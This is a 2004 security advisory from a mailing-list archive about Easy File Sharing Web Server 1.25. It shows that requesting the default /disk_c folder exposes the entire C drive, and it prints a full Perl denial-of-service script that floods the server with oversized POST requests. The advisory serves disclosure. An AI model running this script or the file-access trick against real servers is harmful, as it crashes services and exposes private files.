[NT] Easy File Sharing Web Server File Access and DoS

From: SecuriTeam (support_at_securiteam.com)
Date: 08/29/04

  • Next message: SecuriTeam: "[NT] Keene Digital Media Server Directory Traversal"
    To: list@securiteam.com
    Date: 29 Aug 2004 08:43:09 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Easy File Sharing Web Server File Access and DoS
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.sharing-file.com> Easy File Sharing Web Server is a file
    sharing software that allows visitors to upload/download files easily
    through a Web Browser (IE, Netscape, Opera etc.). It can help you share
    files with your friends and colleagues. They can download files from your
    computer or upload files from theirs. They will not be required to install
    this software or any other software because an Internet browser is enough.
    Easy File Sharing Web Server also provides a Bulletin Board System
    (Forum). It allows remote users to post messages and files to the forum .

    The EFS web server allows any file on the file system to be accessed and
    is also vulnerable to denial of service.
     <http://www.sharing-file.com> Easy File Sharing Web Server is a file
    sharing software that allows visitors to upload/download files easily
    through a Web Browser (IE, Netscape, Opera etc.). It can help you share
    files with your friends and colleagues. They can download files from your
    computer or upload files from theirs. They will not be required to install
    this software or any other software because an Internet browser is enough.
    Easy File Sharing Web Server also provides a Bulletin Board System
    (Forum). It allows remote users to post messages and files to the forum .

    The EFS web server allows any file on the file system to be accessed and
    is also vulnerable to denial of service.

    DETAILS

    Vulnerable Systems:
     * Easy File Sharing webserver version 1.25

    Unauthorized System Access
    The authorization function used by EFS web server is supposed to keep just
    anyone from being able to access your files. But this is not the case and
    an attacker has read access to the entire hard drive by default:
    http://>/disk_c

    This URL will give an attacker read access to the entire C drive. The
    issue is exploited by requesting the name of a virtual folder on the
    server (disk_c is there by default.)

    Denial Of Service
    Easy File Sharing Web Server is vulnerable to a DoS attack and may even be
    remotely crashed by sending a number of large HTTP requests to the web
    server. The CPU usage goes up to 99% and in some cases the server crashes.

    Exploit:
    #!/usr/bin/perl
    #####################################################
    # Easy File Sharing Webserver v1.25 Denial Of Service
    # Proof Of Concept Code By GulfTech Security Research
    #####################################################
    # Easy File Sharing Webserver v1.25 will consume 99%
    # of CPU usage until it crashes when sent large req's
    #####################################################

    use IO::Socket;

    print "=====================================================\n".
           " Easy File Sharing Webserver v1.25 Denial Of Service \n".
           "=====================================================\n";

    unless (@ARGV > 1) { die("usage: efswsdos.pl host port"); }

    my $remote_host = $ARGV[0];
    my $remote_port = $ARGV[1];
    my $done = "\015\012\015\012";
    my $buff = "A" x 1000000;
    my $post = "POST /".$buff." HTTP/1.0 ".$done;

    print "[*] DoS'ing Server $remote_host Press ctrl+c to stop\n";

    while ($post) {
        for (my $i=1; $i<10; $i++) {
        my $i = IO::Socket::INET->new( Proto => "tcp",
        PeerAddr => $remote_host,
        PeerPort => $remote_port,
        Timeout => '10000',
        Type => SOCK_STREAM,
        ) || die("[*] Server Is Dead!");

        print $i $post;
        $i->autoflush(1);
       }
    }
    close $i;

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:security@gulftech.org>
    GulfTech Security.
    The original article can be found at:
    <
    http://www.gulftech.org/?node=research&article_id=00045-08242004>
    http://www.gulftech.org/?node=research&article_id=00045-08242004

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[NT] Keene Digital Media Server Directory Traversal"

    Relevant Pages

    • [Full-disclosure] [CORE-2010-0121] Multiple Vulnerabilities with 8.3 Filename Pseudonyms
      ... Core Security Technologies - CoreLabs Advisory ... Multiple Vulnerabilities with 8.3 Filename Pseudonyms in Web Servers ... Nginx Web Server. ...
      (Full-Disclosure)
    • [CORE-2010-0121] Multiple Vulnerabilities with 8.3 Filename Pseudonyms in Web Servers
      ... Core Security Technologies - CoreLabs Advisory ... Multiple Vulnerabilities with 8.3 Filename Pseudonyms in Web Servers ... Nginx Web Server. ...
      (Bugtraq)
    • Re: [Full-disclosure] server security
      ... I don't see how any can argue against the security value of such a configuration. ... It's unlikely, but you never know, you just might miss out on a nasty worm all because you werent running on a default port one day. ... This is a basic web server that runs email, web and a couple other things. ... -- Securing Apache Web Server with thawte Digital Certificate In this ...
      (Full-Disclosure)
    • RE: server security
      ... I know I have seen a plethora of 3389 automated scans and upon successful connection, attempted password attacks, what would happen if I changed to some other port? ... I am certainly not suggesting it would protect you from an Advanced Persistent Threat, but every little layer of security affords a little protection, deterrence, or delay. ... This is a basic web server that runs email, web and a couple other things. ... Digital Certificate on your Apache web server. ...
      (Security-Basics)
    • Re: [Full-disclosure] server security
      ... I don't see how any can argue against the security value of such a configuration. ... This is a basic web server that runs email, web and a couple other things. ... Certificate on your Apache web server. ... -- Securing Apache Web Server with thawte Digital Certificate In this ...
      (Full-Disclosure)